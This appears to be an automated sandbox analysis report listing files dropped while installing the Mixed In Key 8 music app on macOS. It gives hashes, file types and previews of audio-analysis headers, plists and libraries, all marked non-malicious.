Preview:	//.// MIKBeatAnalyzer.h.// MixedInKey.//.// Created by patrickm on 28-07-10..// Copyright 2010 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import <CoreMedia/CoreMedia.h>...//.speed adaption type for aufTAKT.typedef float MIKBeatAdaptionSpeed;..//.speed adaption values.#define MIKBeatAdaptionSpeedDefault.. 0.0 ./* min value, aufTAKT default /.#define MIKBeatAdaptionSpeedFast.. 1.0.#define MIKBeatAdaptionSpeedSlow..50.0./ max value /...@class MIKBeats;.@interface MIKBeatAnalyzer : NSObject.- (instancetype)initWithNumberOfChannels:(NSUInteger)channels NS_DESIGNATED_INITIALIZER;..- (void)setAdaptationSpeed:(Float32)adaptationSpeed;.- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(AudioBufferList )ioData;.- (OSStatus)analyzeFrames:(CMItemCount)inNumberFrames fromSampleBuffer:(CMSampleBufferRef)bufferRef;.- (BOOL)finishAnalysis;..@property (nonatomic, class) int aufTAKTVersion;.....//.aufTAKT version to use

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_KEyeyh Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C source, ASCII text
Category:	dropped
Size (bytes):	1155
Entropy (8bit):	4.949889119589293
Encrypted:	false
SSDEEP:	24:Xi+FEfhUxgUAcR3Nw5mToR0frf/Q/0fjAd7tQ/c20DhEuRVw:y6lgmu5TRS/Q/AAdxQ/YhEuR6
MD5:	DBCA453CFE33376CAF9120AD7FE1AAB6
SHA1:	73F25D19138C1D8A52B9A1949EA5905E7D2BC953
SHA-256:	1A922B07427E6A1231DCA10C723F49F0657372B2EA974E72E849C016C984A742
SHA-512:	D91EE6450D99703D6471DD229A39C274784665B02F614EDDD4665C3785E3A90CB9D2552B33C0CA06C6258846ADCD2B01EFA6E3EE66AB2280D9B83C968F610377
Malicious:	false
Preview:	/. MIKAudioSpectrum.h. * MixedInKey. . Created by patrickm on 28-02-09.. * Copyright 2009 Mixed In Key LLC. All rights reserved.. . /..#include <stdbool.h>..//.main data structure.typedef struct {..long long.size;......//.length of left/right..float..left;......//.left channel values..float..right;......//.right channel values..bool..adjusted;.....//.adjusted for beats.} MIKAudioSpectrum;...//.create a new spectrum.MIKAudioSpectrum MIKAudioSpectrumCreate(long long size);..//.destroy an existing spectrum.void MIKAudioSpectrumDispose(MIKAudioSpectrum spectrum);..//.create a distinct copy of the passed in spectrum.MIKAudioSpectrum MIKAudioSpectrumCopy(const MIKAudioSpectrum spectrum);..//.create spectrum with linear beat pattern based on detected beats.//.beats are passed as relative locations in the spectrum [0.0, 1.0].MIKAudioSpectrum MIKAudioSpectrumCopyAdjustedForBeats(const MIKAudioSpectrum spectrum,.............. const double *beats,.............. unsigned in

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_L6vQRn Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	699
Entropy (8bit):	5.256874609527757
Encrypted:	false
SSDEEP:	12:W7DXAUxVSDS2B6mGox3iR4XT43DKxuHwqouuASPsqSuny1Iuoryn:W771WD3B6mnx3E4XMzKnYLFln
MD5:	5CE3639AAA1B334F02833F702B92FD0A
SHA1:	BCA722ABB06D0EAD878C0FFFF6188EBCEF340C6D
SHA-256:	6BE3EFFBDA757DEFFC22B1203CADFB834D1DF801DE95DD6A78A6855E936CFB02
SHA-512:	C6B5F5DB0E49059CD52987DACC2CBFE13E1C75F91DE99E53A2E5FAE9FC8B58432B87C675378313978347F8C464588F7BE1FA3FEA4DA5477DDC041E39EFFE29DE
Malicious:	false
Preview:	//.// MIKVolumeAnalyzer.h.// MixedInKey.//.// Created by patrickm on 02-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import <CoreMedia/CoreMedia.h>...//.to pass around the volume histogram. Holds data for _all_ chanels..typedef struct histogram {..UInt64.data[1000];..size_t.size;.} Histogram;...@interface MIKVolumeAnalyzer : NSObject.- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(AudioBufferList *)ioData;.- (OSStatus)analyzeFrames:(CMItemCount)inNumberFrames fromSampleBuffer:(CMSampleBufferRef)sampleBuffer;..@property (readonly) float volume;.@property (readonly) BOOL isClipped;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_NHMmlC Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, UTF-8 Unicode text
Category:	dropped
Size (bytes):	648
Entropy (8bit):	5.148336056806373
Encrypted:	false
SSDEEP:	12:Vnz8l7QnUKAUXI+S1z+AxiqghHtGiZEln:5AKUK1XILRO5/Sn
MD5:	4B371DF3A96CD1297623B91665EFA627
SHA1:	D27EF8EF6C7A2F9077DE19CAE4CACF14227CFBA0
SHA-256:	0E63C55A275CD1EDBC809392BD74B89C573D7E4900FD0A64837E56B45FF3A4A8
SHA-512:	D575C6D232E344094D46CFB723D670773A89A3DB6D9880CFCEE2305204FC9351CCF021F7E766C4C3EB241BEE61A5326C37502A5FD2D6DE8773459BF61EAA1FB4
Malicious:	false
Preview:	//.// MIKAnalysisCuePoint.h.// MIKAnalysis.//.// Created by Martin Douglas on 24/06/2016..// Copyright . 2016 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>..@interface MIKAnalysisCuePoint : NSObject <NSCoding>.+ (instancetype)cuePointWithTime:(NSTimeInterval)time energyLevel:(NSUInteger)energyLevel;.+ (instancetype)cuePointWithJSONDictionary:(NSDictionary )JSONDict;.- (instancetype)initWithJSONDictionary:(NSDictionary )JSONDict;..@property (nonatomic, readonly, copy) NSDictionary *JSONDict;.@property (nonatomic, readonly) NSTimeInterval time;.@property (nonatomic, readonly) NSUInteger energyLevel;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_TWgNY1 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	1983
Entropy (8bit):	5.019316369415542
Encrypted:	false
SSDEEP:	48:8eAQqiT7LU75yykj2vKe/k9q+BqvjcfZbRcK73eGm8:8BjiPLcIyKuKeCquqL4BRcKDe38
MD5:	797165154EB9ACB62D168FEE4C2B1335
SHA1:	E512EEAD5840C5B3DEFF95FAE69E40C39ADA047E
SHA-256:	AB8DE79C660FD13F4C3AC21FDE519146D69F8208157F33817E522CD642D8DD86
SHA-512:	D51335EED907E10D9753785D575373E4FE7D7FEF2D66D209B1F29921958CAF4FFA454239E2190989D59BD1D791A9D9CCC103DDA8731437029626B323F92EC203
Malicious:	false
Preview:	//.// MIKKeytable.h.// MixedInKey.//.// Created by patrickm on 09-05-08..// Copyright 2008 Yakov Vorobyev. All rights reserved..//..#import <Cocoa/Cocoa.h>...typedef NS_ENUM(unsigned int, MIKKeyNotation) {..MIKKeyNotationCamelot.= 0,..MIKKeyNotationFlat,..MIKKeyNotationSharp,..MIKKeyNotationMusicalFlat,.../* for id3 tags /..MIKKeyNotationMusicalSharp,..MIKKeyNotationCount.};...//.key names in the given notation, in order.NSArray MIKKeyNames(MIKKeyNotation notation);..//.get the equivalent index of a key in Camelot notation.NSUInteger MIKIndexForCamelotKey(NSString camelotKey);..//.get the equivalent index of a key in any notation.NSUInteger MIKIndexForKey(NSString key);..//.get the index for the equivalent major key.NSUInteger MIKMajorIndexForCamelotKey(NSString camelotKey);..//.get the index for the equivalent minor key.NSUInteger MIKMinorIndexForCamelotKey(NSString camelotKey);..//.get the string value of a single key. returns @"" if theKey == NSNotFound.NSString *MIKKeyStr

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_VoGwZt Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	724
Entropy (8bit):	5.32385004115712
Encrypted:	false
SSDEEP:	12:4hg1pcDXAUxVSDJDW+hhRz9hRuHwqouuASPsqSu/kRwXfZG3gnGen:TM71WD1XJz9hHYL4kRsfURen
MD5:	CEFD35AA14FEB877DBC4C3627A9D4A6E
SHA1:	6707A2A5AF5705B00FBC3259614386722016CDE4
SHA-256:	97CAD3A70FD32319A5F9652F2825BCC163C28C2949EB32D7591A16C25BAED0C4
SHA-512:	F68D6F0E7465B38516291E53E122953294EE37C3D6D04543ADE777380F1FDF90E4047C573AE0B7D8C2FCF5CEAC7C5239D9509F5CB373613831261EAA61A4406A
Malicious:	false
Preview:	//.// MIKKeyAnalyzer.h.// MixedInKey.//.// Created by patrickm on 01-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import <CoreMedia/CoreMedia.h>..@class MIKAnalysisSegment;..@interface MIKKeyAnalyzer : NSObject.- (instancetype)initWithNumberOfChannels:(NSUInteger)channels NS_DESIGNATED_INITIALIZER;..- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(AudioBufferList )ioData;.- (OSStatus)analyzeFrames:(CMItemCount)inNumberFrames fromSampleBuffer:(CMSampleBufferRef)sampleBuffer;.- (BOOL)finishAnalysis;.- (void)getResult:(MIKAnalysisSegment )result;..@property (nonatomic, readonly) MIKAnalysisSegment *result;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_pMdZOi Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	974
Entropy (8bit):	5.0358269625170315
Encrypted:	false
SSDEEP:	12:RuMz82eS/oAUPAiIO1eT1wMiBxiqghHtGiKUi9iA4A+ukhV9YEln:RLA2eSg1RIOUTLiy5/w9FLihXn
MD5:	C702F0E2EC3150C063E3162E62469280
SHA1:	76AC90B3052DC8D62EB4E27DCB506B60AA517A8A
SHA-256:	0EA5AB2AFCF38AE26666D6C4BC417465682B862FE9D0E709A8D2E16B8EE4CED4
SHA-512:	F2719C0BC4EB1D02DE2F74B4B63C1C1D78B1AA090398A2E6996644BF7CC214E3E615E0A81AFF95E957FD3D44B7AB037D28D3B2D326CE2BA74B11316F1A716D92
Malicious:	false
Preview:	//.// MIKEnergySegment.h.// MIKAnalysis.//.// Created by patrickm on 14-08-12..// Copyright (c) 2012 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>...@interface MIKEnergySegment : NSObject <NSCoding>.+ (instancetype)segmentWithSegmentFeatures:(void /* EnergyFeatureExtractor::SegmentFeatures / )segmentFeatures;.- (instancetype)initWithSegmentFeatures:(void /* EnergyFeatureExtractor::SegmentFeatures / )segmentFeatures;.+ (instancetype)segmentWithJSONDictionary:(NSDictionary )JSONDict;.- (instancetype)initWithJSONDictionary:(NSDictionary )JSONDict;..@property (nonatomic, readonly, copy) NSDictionary JSONDict;.@property (nonatomic, readonly) NSTimeInterval startTime;.@property (nonatomic, readonly) NSTimeInterval endTime;.@property (nonatomic, readonly) double volume;.@property (nonatomic, readonly) double tempo;.@property (nonatomic, readonly) NSArray features;.@property (nonatomic, readonly) NSUInteger energyLevel;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_zZReG9 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Objective-C source, ASCII text
Category:	dropped
Size (bytes):	713
Entropy (8bit):	5.228786670227974
Encrypted:	false
SSDEEP:	12:I282zHAUxVSDpNfHRTuHCcqouuASPsqSu/kRwXfZG3gh4jnGen:4271WDXx8YL4kRsfU/Ken
MD5:	D57F080AF15C84F15A2F1EFE0E0204CB
SHA1:	A80E37DE5193CB3DF9EDC1B80E20C30C4DAF87A5
SHA-256:	79F34169EBF50E13769111021416BE5FB098785EBD2E53233E318B5E37DAEB22
SHA-512:	E647C12B0C9EFEC3066ED39FC3A8CDEE06BE4BACC5B6399F758328EB55BA4E4567714028839F3FFAFB22A109E891710767B42413CB88BA191D159727BF63DAC6
Malicious:	false
Preview:	//.// MIKNewKeyAnalyzer.h.// MIKAnalysis.//.// Created by patrickm on 12-09-13..// Copyright (c) 2013 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreAudio/CoreAudio.h>.#import <CoreMedia/CoreMedia.h>...@class MIKAnalysisSegment;.@interface MIKNewKeyAnalyzer : NSObject..- (OSStatus)analyzeFrames:(UInt32)inNumberFrames fromBuffer:(const AudioBufferList )ioData;.- (OSStatus)analyzeFrames:(CMItemCount)inNumberFrames fromSampleBuffer:(CMSampleBufferRef)sampleBuffer;.- (BOOL)finishAnalysis;.- (void)getResult:(MIKAnalysisSegment )result;..@property (nonatomic, readonly, class) int algorithmVersion;.@property (nonatomic, readonly) MIKAnalysisSegment *result;.@end.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/PrivateHeaders/.BC.T_WqVdky Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	C source, ASCII text
Category:	dropped
Size (bytes):	1626
Entropy (8bit):	4.991353586513803
Encrypted:	false
SSDEEP:	48:2d/qYfsbJhieT8RTh94RBR7nRWpEYxbRDvrR0:KhaIzlvi
MD5:	E41C4EF253D24B9EC72E048A3CD95391
SHA1:	94F12C72646CF82510F4DA587A8E9972BDB29EF0
SHA-256:	BDD3EC839985FD5F9A0897FA001454FA3D7D424C23B897122BF30AEC869B13D9
SHA-512:	6B364101F306F47D961D9E4107340C8494CC1046FD7CE3FA6AD7C3C0EB0AB9CB42E8E1F147705918A6A91D4A2A7C6F8639025F7F4F407483C83F57E3857CBC77
Malicious:	false
Preview:	/. MIKVolumeAnalysis.h. * MixedInKey. . Created by patrick machielse on 22-6-07.. * Copyright 2007 Mixed In Key LLC. All rights reserved.. . /..#ifndef UInt64.#define UInt64 unsigned long long.#endif.../*. .MIKVolumeAnalysis. . .Functions for performing volume analysis on an audio samples.. .For historic reasons this is a pure C/C++ module.. /. .#if defined (__cplusplus).extern "C".{.#endif.....//.Clear the volume table. Call this before each analysis...void MIKClearVolume(UInt64 hist, const int size);...//.Add a sample to the analysis...void MIKAddVolumeSample(UInt64 hist, const int size, const float sample);...//.Calculate the RMS volume [dB] for all samples in bucket range [min, max]...//.Returns 1.0 if the range contains no samples...float MIKRangeVolumeDB(const UInt64 *hist, const int size, const int min, const int max);...//.Calculate the RMS volume [dB] for all samples in range [peak + threshold, peak]...//.Returns 1.0 if the range contains no samples...float

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/.BC.T_VZmGFw Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1350
Entropy (8bit):	5.2195931163044875
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6NN3HCMa6y42Rw0gp/sH2PgCGexwMZhGt0G+h:cfyfVtN3HCcyjO0giH2ICGcwcGt0G+h
MD5:	D881ED1E1ABEAB75A22E0688A2E35A57
SHA1:	AAF08CBA1E4C8DAF8932B46EFEAC7571EA3CE744
SHA-256:	EA0F4CB1EB0F6A49DE9F7E7799D95D809D3EA25F21B2392E9D6417B31AD5709B
SHA-512:	72B9FC8E2589B593125BF1B47DE49106DA1C7C68068175DE0BFD210A256B1AD982E54E36A70CA939F79AFE3EB0D0D949C860E5A23DC91B2B9D6DE1F83BB51616
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>MIKAnalysis</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKAnalysis</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKAnalysis</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/en.lproj/.BC.T_i6SYnI Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Little-endian UTF-16 Unicode text
Category:	dropped
Size (bytes):	92
Entropy (8bit):	3.2610300066712608
Encrypted:	false
SSDEEP:	3:Qwh+yEilSlJlqXMLLkFlVlRDBWjUoFY9n:QpXioJqcLwVlRNWwou9n
MD5:	51EF59B60E5B41B91519CC662A9FE886
SHA1:	3222CA0C39EB50AAF8126BAF852E55430C4718AF
SHA-256:	39CF2EE07B7B333E7C179D0BF4D798A5B72AF6A4E584F51E642703BBFA4FC828
SHA-512:	3952A908B72D44040F5072F6344F6327FC78981C3AA55E931ACAE84C0C9BCC0D148991CD564AF4803765C328CBF5F7EFE9EB558FC56E47E8206B7B706026F30A
Malicious:	false
Preview:	../.. .L.o.c.a.l.i.z.e.d. .v.e.r.s.i.o.n.s. .o.f. .I.n.f.o...p.l.i.s.t. .k.e.y.s. ../.....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/_CodeSignature/.BC.T_IcrRhJ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	6031
Entropy (8bit):	5.204992778518468
Encrypted:	false
SSDEEP:	96:CyWrcTYfBhI95DNStoLwQBN3SBtRsBmX01KUceXZmcTIkYT2BLDzFNQpO/YTbJvy:XjgBu9dCR00WkEDzko
MD5:	4F99A0D02357F047A2310D4FBB0D935A
SHA1:	8E3EC654E5D9246C49EDF5661A8CBFFCA334AA79
SHA-256:	6FF80B298C2B0A5DC1647E36B66CFACABFDE26FEF97AB91C08944905FA6C9291
SHA-512:	2BA51CE7859F4E5FDFAFAD238A2EA844445BEF85C1C6C4A7B975DF150387DEFCAFB91A2F41BC7B9E687C53C2745048812918F111DF2D1EA989A46D2696578BDC
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...qvCMuh5Mja+JMrRu/qx1ceo850Q=...</data>...<key>Resources/en.lproj/InfoPlist.strings</key>...<dict>....<key>hash</key>....<data>....MiLKDDnrUKr4EmuvhS5VQwxHGK8=....</data>....<key>optional</key>....<true/>...</dict>..</dict>..<key>files2</key>..<dict>...<key>Headers/MIKAnalysis.h</key>...<dict>....<key>hash</key>....<data>....bBlMq3kXXqG6Pu4+cJxrwVJFt2E=....</data>....<key>hash2</key>....<data>....4owofQKzsJSygIuqjASC6Pmrisvg7RiYKwee+O6avII=....</data>...</dict>...<key>Headers/MIKAnalysisCuePoint.h</key>...<dict>....<key>hash</key>....<data>....0n7472x6L5B33hnK5MrPFCJ8+6A=....</data>....<key>hash2</key>....<data>....DmPFWidc0e28gJOSvXS4nFc9fkkA/Qpkg35WtF/zpKg=....</data>...</dict>...<key>Headers/MIKAnalysisSegment.h</key>...<dict>....<key>hash</key>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/.BC.T_ZOvbfz Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS>
Category:	dropped
Size (bytes):	159648
Entropy (8bit):	5.925851630215788
Encrypted:	false
SSDEEP:	1536:t3AaCsW5awXU6rCpYP/xOYxDwSG85SS9c36pZ0dao7ck/fGF1tgtBkf3MxCvngJ5:OxE+7/xOQ5TpWdaW/fvtBk/P/gTGY
MD5:	383ABF310D9BFC481F789BE24C962369
SHA1:	9197B7EB916D916900B517FA9E34F0DA54779211
SHA-256:	336BFB5D078A6F99709A7C0EDDAE3CDC79F5B3A89FB6A0713ECEC6BB47B9ECCD
SHA-512:	D10EC73E5DEBB05DD4E848F415BE645087A46B0CE2CB3888538CE104919B55A92DF19D89E6B986912BA64C394579BB060B4A39B7E78BDF6D86ADA641C93AE7AE
Malicious:	false
Preview:	....................(...............h...__TEXT...................p...............p......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT...........#......\|........#..............................__stub_helper...__TEXT...........%......4........%..............................__const.........__TEXT...........)......P........)..............................__cstring.......__TEXT..................=.......................................__objc_methname.__TEXT..........MJ..............MJ..............................__objc_classname__TEXT...........O......]........O..............................__objc_methtype.__TEXT..........uO..............uO..............................__unwind_info...__TEXT...........R...............R..............................__eh_frame......__TEXT...........U......x........U..................................8...__DATA...........p....... .......p....... ......................__nl_symbol_ptr.__DATA..

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/Resources/.BC.T_HLHxot Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, UTF-8 Unicode text
Category:	dropped
Size (bytes):	1283
Entropy (8bit):	5.233067346430371
Encrypted:	false
SSDEEP:	24:2dfyiwBVw6w6S30Ma6pS42Rwgp/sH2PgCGexwMZhGt0G+6:cfyfVQ6S30cpSjOgiH2ICGcwcGt0G+6
MD5:	EDCD136D3414F146AB0E936DFA8684EF
SHA1:	EFC28C4A34F333D37F7A5208DAD83AA67D4C303F
SHA-256:	B8EA49BEBF6B51AD96E5CBA41832FC94000CEA137C9ABDF4C5E5ED4F1BE1B182
SHA-512:	1DE74C5E590C8D18472F6535611894EF9A05221284FA36257CD185E4C4CD8E1E9C65E88EB5B3BCECC382A8480223B5351AECC86C2C153F5E5F32BC7A46E30999
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>en</string>..<key>CFBundleExecutable</key>..<string>MIKAudio</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKAudio</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundleName</key>..<string>MIKAudio</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<string>GM</string>..<key>DTSDKBuild</key>..<string>17E189<

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKAudio.framework/Versions/A/_CodeSignature/.BC.T_0GMP3c Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	2514
Entropy (8bit):	4.911658816604725
Encrypted:	false
SSDEEP:	48:cfyWrud1mef/GvH1qOPOBLSejzFXDj9KHhamOn/GvH1qOvzX5vy:CyWKykYT2BLDzFNQpO/YTbJvy
MD5:	CD7A003B04FBA1C423BCCC3BE26EC9BD
SHA1:	7F3FBEF1BA9984FE21E5459D8F66769F75F0D6AB
SHA-256:	95644765E77A06F5B60B41FC466F9BE48A1853878EF8B84C1DB1768D484C245F
SHA-512:	59B48F4745E574E5C52FA0B4745A81383E38B7CE9856DFB9AAE7E9A805BB30B4A17BC994142B835121C567E929CBFDFD44FC1CE9B006B606AEB5F8DBFA6590A7
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>files</key>..<dict>...<key>Resources/Info.plist</key>...<data>...78KMSjTzM9N/elII2tg6pn1MMD8=...</data>..</dict>..<key>files2</key>..<dict>...<key>Resources/Info.plist</key>...<dict>....<key>hash</key>....<data>....78KMSjTzM9N/elII2tg6pn1MMD8=....</data>....<key>hash2</key>....<data>....uOpJvr9rUa2W5cukGDL8lAAM6hN8mr30xeXtTxvhsYI=....</data>...</dict>..</dict>..<key>rules</key>..<dict>...<key>^Resources/</key>...<true/>...<key>^Resources/.\.lproj/</key>...<dict>....<key>optional</key>....<true/>....<key>weight</key>....<real>1000</real>...</dict>...<key>^Resources/.\.lproj/locversion.plist$</key>...<dict>....<key>omit</key>....<true/>....<key>weight</key>....<real>1100</real>...</dict>...<key>^Resources/Base\.lproj/</key>...<dict>....<key>weight</key>....<real>1010</real>...</dict>...<key>^version.plist$</key>

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/.BC.T_gJffvA Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Mach-O 64-bit x86_64 dynamically linked shared library, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|NO_REEXPORTED_DYLIBS>
Category:	dropped
Size (bytes):	190048
Entropy (8bit):	5.536596703149716
Encrypted:	false
SSDEEP:	3072:HbflcACgwx3haa+8+s7bdN4eXivmUOi+1wh32n:CAuxoChVQOtOt
MD5:	C460B4A834629120E7C5F6676DDEE108
SHA1:	6F8F9E18B49D7AAEF50B6F5B95EB261C1CEFC5C9
SHA-256:	CF64193F27B7D522C6EC1189A44AD055C868E74CA1AA2B498A2EE8A557602589
SHA-512:	B8EC7D20603443227E1101137FFBFAF1232109797443057D2BBEBEC3BBB7658639B5E7E8672C8CE4E3B05190EA0D871E87E7B32B0A84EA2D1859A3DD0217F8FB
Malicious:	false
